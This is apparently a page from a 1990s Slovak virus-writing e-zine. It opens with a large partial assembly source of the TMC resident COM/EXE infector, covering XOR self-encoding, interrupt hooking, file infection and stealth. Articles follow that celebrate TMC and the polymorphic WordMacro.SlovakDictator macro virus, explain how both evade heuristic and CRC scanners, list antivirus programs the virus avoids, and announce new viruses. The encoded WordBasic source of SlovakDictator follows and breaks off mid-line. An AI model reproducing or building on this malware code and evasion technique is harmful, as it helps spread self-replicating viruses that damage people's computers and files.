mov ax,[bx+2] ;if one just after another - no jump sub ax,[bx] cmp ax,DLZINS jne mjin inc dx inc dx call Mtog inc bx inc bx jmp short mshort mjin: call Rnd call Mtog mov dx,di sub dx,OFFSET ibuf-3 add dx,[bx] mov al,0e9h stosb inc bx inc bx mov ax,[bx] sub ax,dx cmp ax,126 jg mnear cmp ax,-129 jl mnear inc ax mov byte ptr [di-1],0ebh stosb ;put short if possible jmp short mshort mnear: stosw mshort: push bx push cx DB 0b9h vysr DW ? DB 0bah nizr DW ? add dx,[bx-2] adc cx,0 push cx push dx

;mov ;mov

cx,vysr dx,nizr

;CX:DX = position for instruction


call PozZac mov cx,DLZINS DB 0bah vpior DW ? ;mov dx,vpior add vpior,cx call Citanie pop dx pop cx jc mhpp call PozZac xchg cx,di mov dx,OFFSET ibuf sub cx,dx call Zapis ;put generated instruction into file mhpp: pop cx pop bx jc mhkon cmp bx,OFFSET poss+2*POCINS jnb mhkon jmp mnxt mhkon: ret MHeader ENDP ;********************* end of m. **************** ;*************** copied routines ************** zZakoduj PROC near mov cx,DLZVIR xor dx,dx ;OFFSET stvir call zzp1 mov ah,40h mov bx,handle pushf DB 9ah DD ? ;call ds:oriv21 jc zzk1 cmp ax,cx zzk1: pushf call zzp1 popf ret zzp1: push cx mov si,dx zzkmax: mov ax,0000h mov cx,DLZVIR zzp2: xor [si],ax zzkaax: add ax,0000h inc si loop zzp2 pop cx ret zZakoduj ENDP zres24: mov al,03h iret zInt13 PROC near pushf call cs:oriv13 ret zInt13 ENDP zTosi PROC near push cx


push dx shr cl,1 shr cl,1 and dh,11000000b or dh,cl mov cl,4 shr dh,cl mov dl,ch xchg si,dx pop dx pop cx ret zTosi ENDP zSkramb PROC near push ax push bx push cx DB 0b0h,? ;mov al,? DB 0bbh,?,? ;mov bx,? znxtss: mov cx,256 zls1: xor word ptr es:[bx],1212h inc bx inc bx loop zls1 dec al jnz znxtss pop cx pop bx pop ax ret zSkramb ENDP zres13: cmp ah,02h je zrtc cmp ah,03h je zrtc jmp zjtoo zrtc: cmp dx,0080h jne zencode test cx,0ffc0h jnz zencode push bx push dx push si push di push cx push cx mov si,ax and si,00ffh mov di,si mov al,01h push ax jz zbzch ;if AL=0 do nothing jcxz zgchi cmp cl,01h je zobbs znxtsc: cmp cl,17 ;if sector number > max. then error ja zgchi zr13ds: cmp cl,07h jb zctoo cmp ah,03h je zgchi push bx


mov cx,512 zflbf: mov byte ptr es:[bx],00h inc bx loop zflbf pop bx zrtcom: add bx,512 pop ax pop cx inc cx push cx push ax dec si jnz znxtsc zbzch: clc zzav: pop ax pushf xchg ax,di sub ax,si popf mov ah,ch pop cx pop cx pop di pop si pop dx pop bx retf 2 zobbs: mov cl,byte ptr cs:(OFFSET r13ds+2) zctoo: call zInt13 mov ch,ah jc zzav jmp zrtcom zgchi: stc mov ch,0bbh ;undefined error jmp zzav zencode:cmp dl,80h ;encoding resp. decoding jne zjtoo push ax push cx push dx push si push ds push cs pop ds mov byte ptr kolzak,0 mov odkzak,bx call zTosi and cl,3fh and dh,3fh zchdnd: or al,al jz zhtvo kontr: cmp si,1234h ;max. cyl. jae zhtvo cmp si,1234h ;min. cyl. jb ztdal inc kolzak jmp short znxslp ztdal: add odkzak,512 znxslp: dec al inc cl DB 80h,0f9h


mxskt DB ? ;cmp cl,? jbe zchdnd mov cl,1 inc dh DB 80h,0feh mxhlv DB ? ;cmp dh,? jbe zchdnd xor dh,dh inc si jmp zchdnd zhtvo: cmp kolzak,0 pop ds pop si pop dx pop cx pop ax je zjtoo cmp ah,02h je zeckn call zSkramb zeckn: call zInt13 pushf call zSkramb popf retf 2 zjtoo: DB 0eah ;zoriv13 DD ? kzZak LABEL near ;********************* EXE,COM modification *********** Subor PROC near Zapis: mov ah,40h jmp short s1 Citanie:mov ah,3fh s1: call s2 jc s3 cmp ax,cx s3: ret Zaciatok:xor cx,cx mov dx,cx PozZac: mov ax,4200h jmp short s2 Koniec: xor cx,cx mov dx,cx PozKon: mov ax,4202h s2 LABEL near Mhandle:mov bx,cs:handle Int21: pushf cli call cs:oriv21 ret Subor ENDP Infikuj PROC mov bp,sp near

mov ax,5700h call Mhandle mov bx,OFFSET ftime mov [bx],cx mov [bx+2],dx ;read time and date of last write call Identify jc mikon0


mov dx,30 call Rnd or dx,dx jz neozn mov [bx],ax

;with prob. 1:30 file won't be marked


neozn: mov vpior,OFFSET orprg ;position in saving area mov dx,0ffffh push dx call Rnd mov word ptr ds:(OFFSET kodmbx+1),dx mov word ptr ds:(OFFSET zkmax+1),dx pop dx call Rnd mov word ptr ds:(OFFSET kodabx+2),dx mov word ptr ds:(OFFSET zkaax+1),dx ;values for encoding call Zaciatok mov cx,1ah mov dx,OFFSET header push dx call Citanie jc mikon1 xchg si,dx mov di,OFFSET bheader rep movsb call Koniec mov si,ax mov di,dx pop bx cmp [bx].id,'MZ' je iEXE cmp [bx].id,'ZM' je iEXE mov bheader.flag,0 ;0 means COM cmp ax,65535-(DLZVIR+(VRCHOL-OFFSET endvir))-1 cmc jc mikon1 mov ax,3 ;do not overwrite leading jump cwd push bx jmp short iCOM iEXE: mov bheader.flag,1 mov ax,[bx].pages mul v512 sub ax,si sbb dx,di mikon0: jc mikon1 ;not whole mov ax,[bx].parps mul v16 push bx push ax push dx iCOM: sub si,ax sbb di,dx MINM=1000 MAXM=3000 or di,di jnz short igt64 mov dx,si sub dx,MINM

;much too long dlhy ?


mikon1: jb mikon2 ;not enough space cmp dx,(MAXM-MINM) jbe iltm igt64: mov dx,(MAXM-MINM) iltm: call Rnd add dx,MINM mov word ptr ds:(OFFSET kodmsi+1),dx add dx,VRCHOL-10h ;SS = CS+1 cmp bheader.flag,0 je iCOM5 mov header.vSP,dx ;set stack pointer iCOM5: add dx,DLZVIR-((VRCHOL-OFFSET stvir)-10h) mov word ptr ds:(OFFSET kodcsi+2),dx ;header limits add dx,OFFSET stsub-DLZVIR mov posss,dx ;set jump after decoding add dx,(-DLZINS+1)-(OFFSET stsub-OFFSET stvir) ;DX=Rnd+MINM-DLZINS+1 mov DLZHDR,dx add dx,DLZINS-2 not dx mov cx,-1 call PozKon ;setting to the virus beginning in file mov vysr,dx mov nizr,ax cmp bheader.flag,0 jne iEXE2 xchg ax,dx add dx,100h jmp short iCOM1 ;if COM take from beginning iEXE2: pop di pop si sub ax,si sbb dx,di ;relatively in file div v16 iCOM1: add word ptr ds:(OFFSET kodmsi+1),dx add word ptr ds:(OFFSET kodcsi+2),dx;set header limits push ax push dx call MHeader ;create header for decoding jnc twnm mikon2: jmp ikon twnm: pop dx pop ax mov cx,POCINS mov si,OFFSET poss il1: add [si],dx inc si inc si loop il1 ;set positions in poss sub nizr,dx sbb vysr,0 ;for correct positions on error pop bx cmp bheader.flag,0 jne iEXE3 mov byte ptr [bx],0e9h mov ax,poss[0*2] sub ax,3+100h mov word ptr [bx+1],ax ;ins. jmp at the beginning mov bheader.items,0 mov bheader.min,0 mov bheader.vCS,-10h mov bheader.vIP,100h jmp short iegh2


iEXE3: mov [bx].vCS,ax inc ax mov [bx].vSS,ax mov ax,poss[0*2] mov [bx].vIP,ax add [bx].vSP,dx ;set SP and byte ptr [bx].vSP,0feh ;SP is even mov [bx].items,0 ;no relocations mov ax,((VRCHOL-OFFSET endvir)-1)/16+1 cmp [bx].min,ax jae iegh1 mov [bx].min,ax iegh1: cmp [bx].max,ax jae iegh2 mov [bx].max,ax ;set up min. and max. memory requirments iegh2: push bx call Koniec call Zakoduj ;put v. to the file end jc ifail call Koniec div v512 inc ax pop bx cmp bheader.flag,0 je iCOM4 iEXE1: mov [bx].pages,ax mov [bx].lpage,dx iCOM4: push bx call Zaciatok mov cx,1ah pop dx call Zapis jc ifail stbkon: mov ax,5701h mov cx,ftime mov dx,fdate call Mhandle ikon: mov sp,bp ret ifail: mov dx,OFFSET orprg mov si,OFFSET poss opdl: push dx lodsw xchg dx,ax mov cx,vysr add dx,nizr adc cx,0 call PozZac pop dx mov cx,DLZINS call Zapis add dx,cx cmp si,OFFSET posss jb opdl ;restore overwritten parts and ftime,0ffe0h ;not marked jmp stbkon Infikuj ENDP ;************** routines for TSR part **** Nastav24 PROC near

;restore time and date


push dx push ds push cs pop ds mov ax,3524h call Int21 mov seg24,es mov off24,bx mov ax,2524h mov dx,OFFSET res24 call Int21 pop ds pop dx ret Nastav24 ENDP Vrat24 PROC near mov ax,2524h lds dx,dword ptr cs:off24 call Int21 ret Vrat24 ENDP POCKRP=6 retaz DB retaz1 DB retaz2 DB Over ;number of critical programs 4,'.COM',4,'.EXE' 4,'SCAN',5,'CLEAN',8,'FINDVIRU',5,'GUARD',3,'EMM' 6,'CHKDSK'

PROC near push dx push bx push cx push si push di push ds push es push ax mov si,dx mov di,OFFSET caname push cs pop es lea bx,[di-1] mov cx,DLZFNB ol1: lodsb cmp al,'a' jb nmp cmp al,'z' ja nmp sub al,'a'-'A' ;uppercase nmp: push ax push si nzero: cmp al,' ' jne nomdz lodsb or al,al jnz nzero ;no ending spaces pop si pop si jmp short nstfn nomdz: pop si pop ax cmp al,'\' je stfn


cmp al,'/' je stfn cmp al,':' jne nstfn stfn: mov bx,di nstfn: stosb or al,al jz whname loop ol1 whname: mov si,OFFSET retaz sub di,5 push cs pop ds call Porovnaj je porok call Porovnaj jne oinok ;is it COM or EXE ? porok: pop ax push ax xchg di,bx inc di cmp ax,4b00h jne nnchk mov si,OFFSET retaz2 call Porovnaj jne nnchk ;is it CHKDSK ? mov byte ptr ds:(OFFSET dtrad+1),OFFSET dnxt-OFFSET con1 nnchk: mov cx,POCKRP mov si,OFFSET retaz1 ol2: push cx call Porovnaj pop cx je oinok loop ol2 ;check for critical programs mov si,OFFSET caname xor bl,bl lodsw cmp ah,':' jne imdrv sub al,'A'-1 mov bl,al imdrv: mov ax,4408h call Int21 or ax,ax vsetky: jz oiok ;removable (floppy like) mov ax,4409h call Int21 jc oinok test dh,10h jnz oiok ;in network oinok: stc okon: pop ax pop es pop ds pop di pop si pop cx pop bx


pop dx ret oiok:; mov ax,0e07h ; int 10h clc jmp okon Over ENDP Porovnaj PROC near push di lodsb mov cl,al mov ax,si add ax,cx repe cmpsb mov si,ax pop di ret Porovnaj ENDP Identify PROC near ;is file inf. ? push dx mov ax,es:[bx+2] xor dx,dx div cs:v30 mov ax,es:[bx] and al,11111b cmp al,dl stc je iekon ;already infected mov ax,es:[bx] and ax,0ffe0h or al,dl clc iekon: pop dx ret Identify ENDP Subdlz PROC near sub word ptr es:[bx],DLZVIR sbb word ptr es:[bx+2],0 jnc npret add word ptr es:[bx],DLZVIR adc word ptr es:[bx+2],0 npret: ret Subdlz ENDP ;************** TSR 21h part ************* Infname PROC near ;DS:DX = file name push ax push bx push cx push si push di push bp push ds push es call Nastav24 mov ax,4300h call Int21 mov cs:attrib,cx mov ax,4301h xor cx,cx call Int21


jc err1 mov ax,3d02h call Int21 jc err2 push dx push ds push cs pop ds push cs pop es mov handle,ax call Infikuj mov ah,3eh call Mhandle pop ds pop dx err2: mov ax,4301h DB 0b9h attrib DW ? ;mov call Int21 err1: call Vrat24 pop es pop ds pop bp pop di pop si pop cx pop bx pop ax ret Infname ENDP


res21: pushf sti cmp ah,11h je dtrad cmp ah,12h jne dnxt dtrad: jmp short con1 ;switched jump condition con1: push bx push es push ax mov ah,2fh call Int21 pop ax call Int21 cmp al,0ffh je dterr push ax cmp byte ptr es:[bx],0ffh jne nrozs add bx,7 nrozs: add bx,17h call Identify pop ax jnc dterr add bx,1dh-17h call Subdlz dterr: pop es pop bx popf iret


dnxt: cmp ah,4eh je drozs cmp ah,4fh jne ndnxt drozs: push bx push es push ax mov ah,2fh call Int21 pop ax call Int21 jc droze push ax add bx,16h call Identify pop ax jnc drozne add bx,1ah-16h call Subdlz drozne: pop es pop bx popf clc retf 2 droze: pop es pop bx popf stc retf 2 ndnxt: cmp ax,4b53h jne obrnxt mov ax,454bh popf iret obrnxt: cmp ah,4ch jne nkprg mov byte ptr cs:(OFFSET dtrad+1),0 nkprg: cld push dx cmp ax,4b00h jne nsppg con3: jmp short miim miim: push ax push bx push ds push es mov ah,52h call Int21 mov ax,es:[bx-02h] nmcb: mov ds,ax add ax,ds:03h inc ax cmp byte ptr ds:00h,'Z' jne nmcb mov bx,cs cmp ax,bx jne cpch mov byte ptr ds:00h,'M' xor ax,ax mov ds,ax add word ptr ds:0413h,POCKIL ;memory look improvement cpch: mov byte ptr cs:(OFFSET con3+1),OFFSET aiim-OFFSET miim


pop es pop ds pop bx pop ax aiim: jmp short infac nsppg: cmp ah,3dh je infac ; cmp ah,43h ; je infac cmp ah,56h je infac cmp ax,6c00h jne nxts test dl,00010010b mov dx,si jz infac jmp short saveh nxts: cmp ah,3ch je saveh cmp ah,5bh je saveh cmp ah,3eh jne jor21 cmp bx,cs:chandle jne jor21 or bx,bx jz jor21 call Int21 jc mirets push ds push cs pop ds mov dx,OFFSET fname call Infname mov chandle,0 pop ds miretc: pop dx popf clc retf 2 jor21: pop dx popf jmp cs:oriv21 infac: call Over jc jor21 call Infname jmp short jor21 saveh: cmp cs:chandle,0 jne jor21 call Over jc jor21 mov cs:rhdx,dx pop dx push dx call Int21 db 0bah rhdx DW ? ;mov dx,rhdx jnc shok mirets: pop dx popf


stc retf 2 shok: push cx push si push di push es xchg si,dx mov di,OFFSET chandle push cs pop es stosw mov cx,DLZFNB rep movsb pop es pop di pop si pop cx jmp short miretc DB order endvir 'DidYouLeaveTheRoom?' DW 1230 ;very important year :) LABEL near

Zakoduj PROC near mov cx,DLZVIR xor dx,dx ;OFFSET stvir call zp1 mov ah,40h mov bx,handle pushf DB 9ah ;call oriv21 oriv21 DD ? jc zk1 cmp ax,cx zk1: pushf call zp1 popf ret zp1: push cx mov si,dx zkmax: mov ax,0000h mov cx,DLZVIR zp2: xor [si],ax zkaax: add ax,0000h inc si loop zp2 pop cx ret Zakoduj ENDP res24: mov al,03h iret Int13 PROC near pushf call cs:oriv13 ret Int13 ENDP Tosi PROC near push cx push dx shr cl,1


shr cl,1 and dh,11000000b or dh,cl mov cl,4 shr dh,cl mov dl,ch xchg si,dx pop dx pop cx ret Tosi ENDP Skramb PROC near push ax push bx push cx DB 0b0h ;mov al,kolzak kolzak DB ? DB 0b8h ;mov bx,odkzak odkzak DW ? nxtss: mov cx,256 ls1: xor word ptr es:[bx],1212h inc bx inc bx loop ls1 dec al jnz nxtss pop cx pop bx pop ax ret Skramb ENDP res13: cmp ah,02h je rtc cmp ah,03h je rtc jmp jtoo rtc: cmp dx,0080h jne encode test cx,0ffc0h jnz encode push bx push dx push si push di push cx push cx mov si,ax and si,00ffh mov di,si mov al,01h push ax jz bzch ;if AL=0 do nothing jcxz gchi cmp cl,01h je obbs nxtsc: cmp cl,17 ;if sector number > max. then error ja gchi r13ds: cmp cl,07h jb ctoo cmp ah,03h je gchi push bx


mov cx,512 flbf: mov byte ptr es:[bx],00h inc bx loop flbf pop bx rtcom: add bx,512 pop ax pop cx inc cx push cx push ax dec si jnz nxtsc bzch: clc zav: pop ax pushf xchg ax,di sub ax,si popf mov ah,ch pop cx pop cx pop di pop si pop dx pop bx retf 2 obbs: mov cl,byte ptr cs:(OFFSET r13ds+2) ctoo: call Int13 mov ch,ah jc zav jmp rtcom gchi: stc mov ch,0bbh ;undefined error jmp zav encode: cmp dl,80h ;encoding resp. decoding jne jtoo push ax push cx push dx push si push ds push cs pop ds mov kolzak,0 mov odkzak,bx call Tosi and cl,3fh and dh,3fh chdnd: or al,al jz htvo cmp si,1234h ;max. cyl. jae htvo cnflte: cmp si,1234h ;min. cyl. jb tdal inc kolzak jmp short nxslp tdal: add odkzak,512 nxslp: dec al inc cl DB 80h,0f9h,?


jbe chdnd mov cl,1 inc dh DB 80h,0feh,? jbe chdnd xor dh,dh inc si jmp chdnd htvo: cmp kolzak,0 pop ds pop si pop dx pop cx pop ax je jtoo cmp ah,02h je eckn call Skramb eckn: call zInt13 pushf call Skramb popf retf 2 jtoo: DB 0eah oriv13 DD ? handle header off24 seg24 ftime fdate chandle fname ibuf caname DW ? strc <> DW ? DW ? DW ? DW ? DW ? DB DLZFNB DUP(?) LABEL byte DB DLZFNB DUP(1)

;variables for mutation

endres LABEL near Vkod ENDS END start

Since some 4 or 5 months it was known, that there has been released some new kind of virus. First rumorz talked 'bout virus, that srews all the heuristic. And, we've to say, it was pure fact, no advertising shit.

>From technical point of view, TMC is resident com'n'exe infector. The infection occurs on execution, opening, renaming and copying of suitable files. This 'll affect com's under 57 kB and exe's under 384 kB. The infection of file, which filename starts with 'ic', 'no', 'we', 'tb', 'av', 'sc', 'co', 'wi' and 'kr' is not possible. These strings covers huge spectrum of anti - viruses. Selected strings covers not only the best Slovak antivirus pragram NOD - ICE, but also other good AV tools. So, TMC has a quit good chance to survive most important first months in the wild. TMC sets second in timestamp to 'magic' value 8. Virus contains texts: TMC 1.0 by Ender from Slovakia Welcome to the Tiny Mutation Compiler! Dis is level 42. Greetings to virus makers: Dark Avenger, Vyvojar, Hell Angel Personal greetings: K. K., Dark Punisher

And you may now ask : " And what makes TMC so extraordinary ?" Okay, let's go to the void main(). #define FALSE 0 #define TRUE 1 #define NOT_TRIVIAL 0.5 #define INFECTED_FILE_CONTAIN_BODY_OF VIRUS FALSE

/* Body of the virus cointains just some kind of compiler, which from from excrypted source pseudocode copiles virus to the memory. Because the compilation does't use any structure, which are heurictic sensitive, there is no heuristic alert here :) [ Simple and clever ] The copiler is also capable to insert garbage jump instruction in the virus copy in memory.So again, no . siple scanstring in memory here. Just one little thingy is here not perfect. These jump 'll not have known size, so the compiler puts here some extra NOPs. The virus is the like asm proggy compiled umnder TASM without /m switch. */

#define ANTIHEURISTIC_CODE TRUE /* TMC contains some kind of anti cleaning trap. So it is not easy to remove from infected file. Well, another life insurance */ #define EXTRA_STUFF TRUE /* TMC has in diffrerent generations different features. Just check it out */ #define DETECTION_AND_REMOVAL NOT_TRIVIAL /* As far as i know, only two antivirus programs detect TMC - Dr.Web and NOD-ICE. As extra bonus, NOD is capable to remove TMC. Some dudes from AV side seems to be really good in their work :( */

Ender, the perspective author of this virus, has choosen his nick from the 'Enders game' by Orson Scott Card. Strings "Welcome to the Tiny Mutation Compiler!" and "Diz is level 42" are according the author related to Level3 by Vyvojar.

Due some kind of agreement between our mag and Ender, we were not allowed to publish the full sources of this excelent virus. As Ender stated, the sources 'll be released only after all the major anti-virus vendors 'll detect and remove the virus. "They should have their work hard... they 're payed for it, but we are not ...". So dear friend, we present you at least sample of this virus. But we have source prepared for public release asap TMC 'll be removed by TBAV,SCAN,AVP,DRWEB,S&S,ALWIL! and other from Virus Bulletin. Howgh !

Download here

The first world true polymorphic macro virus infecting Word 7.x documents. The virus ofthe next generation. This decription brought to you by Nasty Lamer & Ugly Luser Exclusively for the *-zine. (c) 1-mar-1997, Slovakia
In this article will be described, how this macro virus works, what are its advantages in comparison with other existing Word 6.0, 7.0 macro viruses, its disadvantages and finally the plans of authors of this virus for the near future will be mentioned. Source code (2nd generation) is shown at the end of this article. The macro generator (Lamer's Macro Engine) itself is not presented intentionally.

Introduction Macro viruses for Word 6.0 and above infects Micro$oft Word documents and templates. The first macro virus for Word was written in fall of 1994. In the present there are over 500 known macro viruses and their number grows rapidly every day. But many of them are very similar each to other and do not offer anything new to the virus writing technology. They use almost the same infection techniques and their bodies are the same in each copy of the virus. Many of them are very lame and primitive. Authors of macro viruses very often use whole parts from other macro viruses in their macro, modify them a little bit and release them as new viruses. But almost all known macro viruses have for each copy the same binary image of the macro body (so-called static macros). This feature very simplifies the work of antivirus companies. They can detect these macros very exactly with high accuracy by using CRC method. They are able to add detection for several hundreds macro viruses a days by using programs for an automatic generation of the CRC for the macro bodies. Current macro virus writers are not too inventive and it looks like that only lamers write macro viruses. Do not forget, that macro virus writing is not for real virus writers as they prefer writing in assembler. The first break through in macro virus writing technology has caused the Outlaw virus. It was the first semi-polymorphic virus. Why semi-polymorphic ? Because only the macro names were different in the each copy of the virus but its body has remained still static (some antiviruses used to detect the viruses by their names). However for peoples interesting in the antivirus industry it was a nice opportunity to flood various magazines with detailed description of this "new technology" in macro virus writing. After a long time the macro virus writers have detected that Micro$oft Word Basic gives a possibility for macro editing and creating polymorphic macro viruses. In the present these

possibilities are not used very often. There exists only few viruses which modify something in their source code and make the each generation a little bit different. Their most often used method is simply in inserting one or several dummy lines to the source code or changing names for some variable. The true polymorphic viruses was not known until WordMacro.SlovakDictator appears.

Behind the macro viruses detection techniques The antivirus programs uses different techniques to detect macro viruses. >From the point of view of used techniques, we can arrange them into the following categories: 1. The method based on looking for "virus strings" Because a big part of the macros includes texts, strings must be enough long to avoid possible false alarms. The frequently used and also reasonable size for these strings is between 24 and 32 bytes. The advantage of this method is in the fact that by using one search string it can detect several variants of the big family of viruses. In the most cases this method can not detect viruses exactly. 2. Method based on computing CRC's This is the only method which is able to detect all static macro viruses exactly. The big disadvantage of using this method is that it fails in those cases, that someone adds for example the tabulator mark after the end of macro :). In the present most of the antivirus programs use this method. 3. Method based on heuristic analyzing of the macros This is good a method for detecting new and even unknown macro viruses. 4. Other methods They use a combination of several methods mentioned above or some new techniques.

Description of the WordMacro.SlovakDictator macro virus This virus is the first real attempt how to write an macro virus undetectable by "search strings". It also fucks all scanner based on computing CRC, because it has almost unlimited mutation capability. We decided to write this virus to to illustrate some techniques, which offers MacroFuck Corporation and their Macro$Soft Word for macro viruses writers. The virus contains only one unencrypted viral macro AutoClose and its size is from 14 kB to 16 kB (the size for variant B may overreach 16 kB). All names of variables, procedures, functions and constants are fully mutated and for this reason the final size of the macro is different for each copy of the virus. The macro does not use any command for copying macros (MacroCopy or Organizer) for replicating. It uses simply only commands for creating and editing macros. Due to this feature it is not detectable by know virus scanners yet, even not by the heuristic scanners. The detection of this virus will probably cause problems to antivirus programs which use "search strings" for macro detecting. The whole macro is divided into three parts. In the first part are declared all global variables, arrays and constants. In the second part is performed a check for the version of Word and it contains all procedures and functions needed for creating macro and its execution. The third and the final part contains two tables. In the first table is stored the whole macro body (its

source lines) in an encrypted form. The source lines in this table does not contain two tables mentioned above because they are already present in the third part of the macro. The actions of the macro virus is performed in several steps: 1. It checks whether of the Micro$oft Word in use is 7.x. If yes, the further steps are performed, otherwise the macro will finish. 2. It decrypts the first table in the third part of the macro. The choosen encryption method is very trivial. Each byte is decrypted with a constant which may have values from 4 to 13 (try to guess why ?). This value is added (or subtracted) to the each character in the strings that belong to the first table in the third part of the macro. 3. It creates temporary macro with a random name and inserts decrypted source lines of the macro (the first two parts of the macro) to it. 4. It replaces all occurrences of the string "@@" with """. The characters @@ are used to mark all places that have to be replaced with a quote. 5. It inserts both tables at the end of this macro - the table with decrypted source lines and the table with polymorphic names of variables, procedures, functions and constants. 6. It calls procedure which will mutate all names stored in table with polymorphic names. These names are from 10 to 19 characters long. 7. It runs this temporary macro When the macro is executed it first checks, whether it has to infect global template or document. If the global template and the closing document already contains macro named AutoClose nothing is done. Otherwise the macro creates a macro AutoClose in the global template or document and executes similar actions which were described in the previous paragraphs. .

The macro contains the special payload. In the each 4th and 11th of the month it displays a message box with a special warning that you are infected by WordMacro.SlovakDictator virus.

8. It deletes the temporary macro, enables screen updating, enables interrupting a macro by pressing the ESC key and finishes.

Advantages of the virus: The virus brings the new technology to macro viruses writing :) It is the first Slovak macro virus :) It is the first world true polymorphic virus :) Its source lines are internally encrypted by a different encryption constant :) It will be hard to detect it by "search strings", because it does not contain any typical virus strings. It can not be detected by computing CRC (only lame researchers will do that) :) The largest possible string is 15 bytes long, but this string can not be used as a virus string. It does not use commands for copying macros :) It does not contain an operation suspected for heuristic scanners :) Known antivirus program does not detect it, even heuristic programs

Disadvantages: The process of the infection is very slow, it may take over 15 seconds on slow PC's (on tested Pentium 166 Mhz it took 15 seconds) :| Although the virus prevents the ESC key from interrupting the macro, pressing keys while the virus is running may cause a bug in creating mutated names of variables and due to this reason a bug in the executing macro may occur. (it will be fixed in the version for Word 8.0) :| The virus is language dependent - it infects only English version of Word 7.x documents. Due to its special infection techniques it is not able to infect Word 8.0 documents.

There are two variants of this virus WordMacro.SlovakDictator.A (described in this article) and WordMacro.SlovakDictator.B. In the variant B were done small changes but the basics has remained the same. This variant works similarily as the variant A, but it displays the following dialog box:

Our plans for the near future

We would like to show the big potential of the Micro$oft Visual Basic to all macro viruses writers by rewriting SlovakDictator for the Micro$oft Word version 8.0. We hope that the next version written in Visual Basic will be undetectable for a long time. We are planing also to write fully polymorphic macro virus infecting the Micro$oft Excel documents and a multiplatform virus infecting the Office documents.

Conclusion The Lamer's Macro Engine and the source code generator of the described macro virus is not presented because each lamer, even Vesselin B. (well known as fucking pig and shithead), is able in 20 minutes analyze this virus and understand it. But we are not sure about that Vesselin B :). We wrote this virus within one day and we hope that the other lame macro virus writers are able to do it too. And finally, we just invented the brand new method, how to speed up the internal encryption and decryption, so the next version will be much faster (and maybe it will be permutated !):)

Big thanks goes to ( MacroFuck Corporation for their famous Virus Development Kit for multiple platforms. Micro$oft Word is a registered trade mark of the ( MacroFuck Corporation)

Dedicated to:

Download here


REM REM REM REM REM Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim Dim

--------- WordMacro.SlovakDictator.A --------- source code - 2nd generation --------- it is cool, isn't it ? --------- do not modify ! --------------------------------------Shared JOLSRGVAJVAVPCQSFS Shared RSTSDTQABCFRIMEDS Shared NNJVBQFICLBT Shared CTSBMNQRJVKTUN Shared RAQIEGQHTEKGMJPA Shared BLMVUIODKQID Shared TRFEHFFKDGA Shared PNFFUDGIOJHJMOJS Shared EEMSCNFUSDSA Shared IMNVDDCUIELPKGOQ Shared KILNETOHSCNTSGEB Shared FDCKUBLQVSMCLCS$(200) Shared ESBGMDHQMTV Shared UKEHLODOGSTCBCFES Shared LAOGRDANQUAUGEMDRC Shared TISEIKHODQQCGBM$(31) Shared VAHINRNESDMBBCBTNOG




6 = = = =





FDCKUBLQVSMCLCS$(66) = "VgxrgsktztV{i&C&Jg.Tu}.//" FDCKUBLQVSMCLCS$(67) = "Ol&VgxrgsktztV{i&C&:&Ux&VgxrgsktztV{i&C&77&Znkt" FDCKUBLQVSMCLCS$(68) = "Hkkv" FDCKUBLQVSMCLCS$(69) = "Hkmot&Jogrum&[ykxJogrum&9>62&88:2&FF\ox{y&GRKXZ'FF" FDCKUBLQVSMCLCS$(70) = "Zk~z&8?2&>2&9:?2&792&FF_u{-xk&otlkizkj&h&]uxjSgixu4Yru|gqJoizgzux&|ox{yFF2&4Zk~z7" FDCKUBLQVSMCLCS$(71) = "Zk~z&7;2&8>2&9<62&792&FF]kriusk&zu&znk&RSK&.Rgskx-y&Sgixu&Ktmotk/&|kx4&7466FF2&4Zk~z8" FDCKUBLQVSMCLCS$(72) = "Zk~z&7:;2&;72&7892&792&FFJoy&oy&Rk|kr&:87FF2&4Zk~z9" FDCKUBLQVSMCLCS$(73) = "Zk~z&9;2&=92&9:82&792&FF.i/&73sgx3?=2&Tgyz&Rgskx&,,&[mr&R{ykx2&Yru|gqogFF2&4Zk~z:" FDCKUBLQVSMCLCS$(74) = "Zk~z&9:2&?>2&9:92&792&FFJoy&oy&znk&loxyz&}uxrj&zx{k&vursuxvnoi&sgixu&|ox{y&'FF2&4Zk~z;" FDCKUBLQVSMCLCS$(75) = "V{ynH{zzut&7862&7>>2&7:=2&872&FFGiikvz&5&Y{nrgyFF2&4V{yn7" FDCKUBLQVSMCLCS$(76) = "Zk~z&7662&7<;2&88>2&792&FFHom&l{iq&zu&znk&hom&hu~kx&\4S4FF2&4Zk~z<" FDCKUBLQVSMCLCS$(77) = "Ktj&Jogrum" FDCKUBLQVSMCLCS$(78) = "Jos&jrm&Gy&[ykxJogrum" FDCKUBLQVSMCLCS$(79) = "Jogrum.jrm/" FDCKUBLQVSMCLCS$(80) = "Ktj&Ol" FDCKUBLQVSMCLCS$(81) = "Ktj&Y{h" FDCKUBLQVSMCLCS$(82) = "" FDCKUBLQVSMCLCS$(83) = "L{tizout&InkiqOtyzgrrkj.p/" FDCKUBLQVSMCLCS$(84) = "Ut&Kxxux&Xky{sk&Tk~z" FDCKUBLQVSMCLCS$(85) = "InkiqOtyzgrrkj&C&6" FDCKUBLQVSMCLCS$(86) = "Lux&o&C&7&Zu&Iu{tzSgixuy.p/" FDCKUBLQVSMCLCS$(87) = "Ol&SgixuTgsk*.o2&p/&C&FFG{zuIruykFF&Znkt&InkiqOtyzgrrkj&C&7" FDCKUBLQVSMCLCS$(88) = "Tk~z&o" FDCKUBLQVSMCLCS$(89) = "Ktj&L{tizout" FDCKUBLQVSMCLCS$(90) = "" FDCKUBLQVSMCLCS$(91) = "Y{h&Otlkiz.]ngzZuOtlkiz/" FDCKUBLQVSMCLCS$(92) = "I[SQSKJWYXM*&C&]otju}Tgsk*./" FDCKUBLQVSMCLCS$(93) = "ZuurySgixu&4Tgsk&C&FFG{zuIruykFF2&4Ynu}&C&]ngzZuOtlkiz2&4Kjoz" FDCKUBLQVSMCLCS$(94) = "KjozIrkgx&3&86" FDCKUBLQVSMCLCS$(95) = "" FDCKUBLQVSMCLCS$(96) = "-5555" FDCKUBLQVSMCLCS$(97) = "-5555&\ru€ktok&vx|in&KYHMSJNWSZ\&xogjqu|&quj{&sgqxg" FDCKUBLQVSMCLCS$(98) = "-5555&|ojozkrtg&igyz&3&tksktoz&'" FDCKUBLQVSMCLCS$(99) = "-5555" FDCKUBLQVSMCLCS$(100) = "Lux&o&C&6&Zu&KYHMSJNWSZ\&@&Otykxz&LJIQ[HRW\YSIRIY*.o/&@&OtykxzVgxg&@&Tk~z&o" FDCKUBLQVSMCLCS$(101) = "-5555" FDCKUBLQVSMCLCS$(102) = 